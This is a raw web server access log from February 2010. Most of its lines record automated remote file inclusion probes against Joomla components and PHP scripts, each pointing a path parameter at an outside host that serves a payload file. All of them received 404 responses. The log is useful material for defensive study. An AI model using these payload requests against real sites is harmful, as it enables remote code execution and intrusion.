116.40.122.117 - - [07/Feb/2010:10:49:02 -0500] "GET /log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338
116.40.122.117 - - [07/Feb/2010:10:49:19 -0500] "GET /log/sdaglobal.org-access_log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 363
116.40.122.117 - - [07/Feb/2010:10:49:19 -0500] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 334
116.40.122.117 - - [07/Feb/2010:10:49:19 -0500] "GET /log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338
91.121.146.197 - - [07/Feb/2010:10:50:32 -0500] "GET /log/sdaglobal.org-access_log.2/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 372
91.121.146.197 - - [07/Feb/2010:10:50:32 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 341
91.121.146.197 - - [07/Feb/2010:10:50:33 -0500] "GET /log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 345
208.43.13.149 - - [07/Feb/2010:10:51:30 -0500] "GET /log//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 295
208.43.13.149 - - [07/Feb/2010:10:51:31 -0500] "GET /log/sdaglobal.org-access_log.4//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 322
208.43.13.149 - - [07/Feb/2010:10:51:31 -0500] "GET //index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 291
208.43.13.149 - - [07/Feb/2010:10:51:39 -0500] "GET //index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 291
208.43.13.149 - - [07/Feb/2010:10:51:39 -0500] "GET /log//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 295
208.43.13.149 - - [07/Feb/2010:10:51:39 -0500] "GET /log/sdaglobal.org-access_log.4//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 322
208.43.13.149 - - [07/Feb/2010:10:55:30 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 324
208.43.13.149 - - [07/Feb/2010:10:55:34 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 324
58.115.195.196 - - [07/Feb/2010:11:06:10 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
58.115.195.196 - - [07/Feb/2010:11:06:10 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
80.190.33.158 - - [07/Feb/2010:11:07:28 -0500] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 375
80.190.33.158 - - [07/Feb/2010:11:07:28 -0500] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 342
80.190.33.158 - - [07/Feb/2010:11:07:29 -0500] "GET /log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 346
91.121.146.197 - - [07/Feb/2010:11:07:45 -0500] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 358
91.121.146.197 - - [07/Feb/2010:11:07:45 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 354
80.190.33.158 - - [07/Feb/2010:11:07:57 -0500] "GET /log/sdaglobal.org-error_log.2%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 374
89.36.175.10 - - [07/Feb/2010:11:09:43 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 331
89.36.175.10 - - [07/Feb/2010:11:09:43 -0500] "GET /log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 335
89.36.175.10 - - [07/Feb/2010:11:09:43 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 364
216.119.103.12 - - [07/Feb/2010:11:10:43 -0500] "GET /log/sdaglobal.org-access_log.4//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 344
216.119.103.12 - - [07/Feb/2010:11:10:43 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 313
216.119.103.12 - - [07/Feb/2010:11:10:45 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 317
216.119.103.12 - - [07/Feb/2010:11:11:56 -0500] "GET /log/sdaglobal.org-access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 342
114.41.5.212 - - [07/Feb/2010:11:13:14 -0500] "GET / HTTP/1.1" 200 9426
114.41.5.212 - - [07/Feb/2010:11:13:15 -0500] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
114.41.5.212 - - [07/Feb/2010:11:13:15 -0500] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
114.41.5.212 - - [07/Feb/2010:11:13:15 -0500] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
114.41.5.212 - - [07/Feb/2010:11:13:17 -0500] "GET /images/welcome.gif HTTP/1.1" 200 2565
114.41.5.212 - - [07/Feb/2010:11:13:17 -0500] "GET /images/select.gif HTTP/1.1" 200 1792
114.41.5.212 - - [07/Feb/2010:11:13:18 -0500] "GET /images/english.gif HTTP/1.1" 200 2582
114.41.5.212 - - [07/Feb/2010:11:13:18 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
114.41.5.212 - - [07/Feb/2010:11:13:19 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
114.41.5.212 - - [07/Feb/2010:11:13:19 -0500] "GET /images/czech.gif HTTP/1.1" 200 1137
114.41.5.212 - - [07/Feb/2010:11:13:19 -0500] "GET /images/filipino.gif HTTP/1.1" 200 1328
114.41.5.212 - - [07/Feb/2010:11:13:20 -0500] "GET /images/france.gif HTTP/1.1" 200 1094
109.72.80.134 - - [07/Feb/2010:11:13:20 -0500] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 372
114.41.5.212 - - [07/Feb/2010:11:13:20 -0500] "GET /images/germany.gif HTTP/1.1" 200 986
109.72.80.134 - - [07/Feb/2010:11:13:20 -0500] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 342
114.41.5.212 - - [07/Feb/2010:11:13:20 -0500] "GET /images/hungary.gif HTTP/1.1" 200 1115
109.72.80.134 - - [07/Feb/2010:11:13:21 -0500] "GET /log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 346
114.41.5.212 - - [07/Feb/2010:11:13:21 -0500] "GET /images/india.gif HTTP/1.1" 200 1050
114.41.5.212 - - [07/Feb/2010:11:13:21 -0500] "GET /images/italy.gif HTTP/1.1" 200 1095
114.41.5.212 - - [07/Feb/2010:11:13:22 -0500] "GET /images/japan.gif HTTP/1.1" 200 1104
114.41.5.212 - - [07/Feb/2010:11:13:22 -0500] "GET /images/korea.gif HTTP/1.1" 200 1387
109.72.80.134 - - [07/Feb/2010:11:13:25 -0500] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 373
222.239.227.155 - - [07/Feb/2010:11:16:15 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306
222.239.227.155 - - [07/Feb/2010:11:16:15 -0500] "GET /log//agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310
222.239.227.155 - - [07/Feb/2010:11:16:15 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 339
200.93.147.154 - - [07/Feb/2010:11:19:01 -0500] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 324
200.93.147.154 - - [07/Feb/2010:11:19:04 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
200.93.147.154 - - [07/Feb/2010:11:19:04 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 320
200.93.147.154 - - [07/Feb/2010:11:19:20 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 353
200.93.147.154 - - [07/Feb/2010:11:19:23 -0500] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 324
88.198.197.249 - - [07/Feb/2010:11:22:32 -0500] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 372
88.198.197.249 - - [07/Feb/2010:11:22:34 -0500] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 342
88.198.197.249 - - [07/Feb/2010:11:22:36 -0500] "GET /log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 346
88.198.197.249 - - [07/Feb/2010:11:22:39 -0500] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 373
24.111.136.245 - - [07/Feb/2010:11:24:37 -0500] "GET /favicon.ico HTTP/1.1" 404 292
218.38.136.125 - - [07/Feb/2010:11:25:04 -0500] "GET /log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 336
218.38.136.125 - - [07/Feb/2010:11:25:05 -0500] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 332
218.38.136.125 - - [07/Feb/2010:11:25:09 -0500] "GET /log/sdaglobal.org-access_log.4///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 363
125.141.91.138 - - [07/Feb/2010:11:25:15 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 305
125.141.91.138 - - [07/Feb/2010:11:25:15 -0500] "GET /log/sdaglobal.org-access_log.3/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 336
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 309
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 309
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /log/sdaglobal.org-access_log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 334
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 305
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /log/sdaglobal.org-access_log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 334
125.141.91.138 - - [07/Feb/2010:11:25:16 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 305
211.233.11.186 - - [07/Feb/2010:11:25:17 -0500] "GET /log/sdaglobal.org-access_log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 334
211.233.11.186 - - [07/Feb/2010:11:25:17 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 305
211.233.11.186 - - [07/Feb/2010:11:25:17 -0500] "GET /log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 309
125.141.91.138 - - [07/Feb/2010:11:25:17 -0500] "GET /log/tools/send_reminders.php?noSet=0&includedir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 309
122.126.110.186 - - [07/Feb/2010:11:25:36 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
122.126.110.186 - - [07/Feb/2010:11:25:36 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
70.38.54.250 - - [07/Feb/2010:11:25:51 -0500] "GET /log/sdaglobal.org-access_log.1//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 332
70.38.54.250 - - [07/Feb/2010:11:25:52 -0500] "GET //citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 301
70.38.54.250 - - [07/Feb/2010:11:26:38 -0500] "GET /log/sdaglobal.org-error_log.2//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 331
210.127.209.105 - - [07/Feb/2010:11:28:29 -0500] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 375
210.127.209.105 - - [07/Feb/2010:11:28:30 -0500] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 342
210.127.209.105 - - [07/Feb/2010:11:28:31 -0500] "GET /log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 346
70.38.54.250 - - [07/Feb/2010:11:28:52 -0500] "GET /log/sdaglobal.org-access_log.4//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 332
70.38.54.250 - - [07/Feb/2010:11:29:10 -0500] "GET /log/sdaglobal.org-error_log.4//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 331
200.93.147.154 - - [07/Feb/2010:11:29:40 -0500] "GET /log/sdaglobal.org-error_log.1%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 352
213.251.189.203 - - [07/Feb/2010:11:31:03 -0500] "GET /log/sdaglobal.org-access_log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356
213.251.189.203 - - [07/Feb/2010:11:31:03 -0500] "GET //www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 327
213.251.189.203 - - [07/Feb/2010:11:31:03 -0500] "GET /log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET /log/sdaglobal.org-access_log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET /log/sdaglobal.org-access_log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET /log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET //www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 327
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET /log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331
213.251.189.203 - - [07/Feb/2010:11:31:08 -0500] "GET //www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 327
213.251.189.203 - - [07/Feb/2010:11:31:15 -0500] "GET //www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 327
213.251.189.203 - - [07/Feb/2010:11:31:15 -0500] "GET /log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331
213.251.189.203 - - [07/Feb/2010:11:31:15 -0500] "GET /log/sdaglobal.org-access_log//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356
213.251.189.203 - - [07/Feb/2010:11:31:22 -0500] "GET /log/sdaglobal.org-error_log.1//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357
213.251.189.203 - - [07/Feb/2010:11:31:26 -0500] "GET /log/sdaglobal.org-error_log.1//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357
213.251.189.203 - - [07/Feb/2010:11:31:29 -0500] "GET /log/sdaglobal.org-error_log.1//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357
213.251.189.203 - - [07/Feb/2010:11:31:36 -0500] "GET /log/sdaglobal.org-error_log.1//www/bbs/delete_comment.php/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357
151.8.79.19 - - [07/Feb/2010:11:36:39 -0500] "GET /log/akocomments.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 300
151.8.79.19 - - [07/Feb/2010:11:36:39 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 296
70.38.54.250 - - [07/Feb/2010:11:37:53 -0500] "GET /log/sdaglobal.org-access_log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 330
70.38.54.250 - - [07/Feb/2010:11:38:09 -0500] "GET /log/sdaglobal.org-error_log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 329
211.108.61.176 - - [07/Feb/2010:11:39:44 -0500] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 373
211.108.61.176 - - [07/Feb/2010:11:39:44 -0500] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 342
211.108.61.176 - - [07/Feb/2010:11:39:45 -0500] "GET /log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 346
186.28.232.13 - - [07/Feb/2010:11:41:27 -0500] "GET /log/sdaglobal.org-access_log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 321
186.28.232.13 - - [07/Feb/2010:11:41:27 -0500] "GET /log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 296
186.28.232.13 - - [07/Feb/2010:11:41:27 -0500] "GET //errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 292
213.171.37.206 - - [07/Feb/2010:11:43:57 -0500] "GET /log/sdaglobal.org-access_log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 321
213.171.37.206 - - [07/Feb/2010:11:43:57 -0500] "GET /log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 296
213.171.37.206 - - [07/Feb/2010:11:43:57 -0500] "GET //errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 292
66.249.65.235 - - [07/Feb/2010:11:44:22 -0500] "GET /robots.txt HTTP/1.1" 404 291
66.249.65.235 - - [07/Feb/2010:11:44:23 -0500] "GET /images/auccf.gif HTTP/1.1" 304 -
220.73.144.196 - - [07/Feb/2010:11:44:24 -0500] "GET /////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 335
220.73.144.196 - - [07/Feb/2010:11:44:24 -0500] "GET /log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 339
220.73.144.196 - - [07/Feb/2010:11:44:24 -0500] "GET /log/sdaglobal.org-access_log.1%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 368
211.108.61.176 - - [07/Feb/2010:11:48:18 -0500] "GET /log/sdaglobal.org-error_log.2///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 372
220.73.144.196 - - [07/Feb/2010:11:48:45 -0500] "GET //bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322
220.73.144.196 - - [07/Feb/2010:11:48:45 -0500] "GET /log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 326
220.73.144.196 - - [07/Feb/2010:11:48:45 -0500] "GET /log/sdaglobal.org-access_log.4//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353
220.73.144.196 - - [07/Feb/2010:11:49:01 -0500] "GET /log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 326
220.73.144.196 - - [07/Feb/2010:11:49:04 -0500] "GET //bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322
220.73.144.196 - - [07/Feb/2010:11:50:24 -0500] "GET /log//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 326
220.73.144.196 - - [07/Feb/2010:11:50:24 -0500] "GET /log/sdaglobal.org-access_log.4//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353
220.73.144.196 - - [07/Feb/2010:11:50:27 -0500] "GET //bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322
208.43.13.149 - - [07/Feb/2010:11:51:16 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 315
208.43.13.149 - - [07/Feb/2010:11:51:16 -0500] "GET /log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 319
220.73.144.196 - - [07/Feb/2010:11:52:44 -0500] "GET /////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 335
220.73.144.196 - - [07/Feb/2010:11:52:44 -0500] "GET /log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 339
220.73.144.196 - - [07/Feb/2010:11:52:44 -0500] "GET /log/sdaglobal.org-access_log.1%20%20/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 368
208.43.13.149 - - [07/Feb/2010:11:54:17 -0500] "GET /log/sdaglobal.org-access_log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 346
58.150.99.131 - - [07/Feb/2010:11:56:23 -0500] "GET /log//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 305
58.150.99.131 - - [07/Feb/2010:11:56:27 -0500] "GET //include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 301
58.150.99.131 - - [07/Feb/2010:11:56:29 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 334
198.145.116.13 - - [07/Feb/2010:11:57:10 -0500] "GET /mirror.htm HTTP/1.0" 200 3525
220.73.144.196 - - [07/Feb/2010:11:58:16 -0500] "GET /log/sdaglobal.org-access_log.1/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 366
216.119.103.12 - - [07/Feb/2010:11:58:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 313
216.119.103.12 - - [07/Feb/2010:11:58:26 -0500] "GET /log/sdaglobal.org-access_log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 344
216.119.103.12 - - [07/Feb/2010:11:58:27 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 317
58.150.99.131 - - [07/Feb/2010:12:03:45 -0500] "GET /log//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 305
58.150.99.131 - - [07/Feb/2010:12:03:48 -0500] "GET //include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 301
58.150.99.131 - - [07/Feb/2010:12:03:50 -0500] "GET /log/sdaglobal.org-access_log.1%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 334
208.43.13.149 - - [07/Feb/2010:12:04:13 -0500] "GET /log/sdaglobal.org-access_log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 344
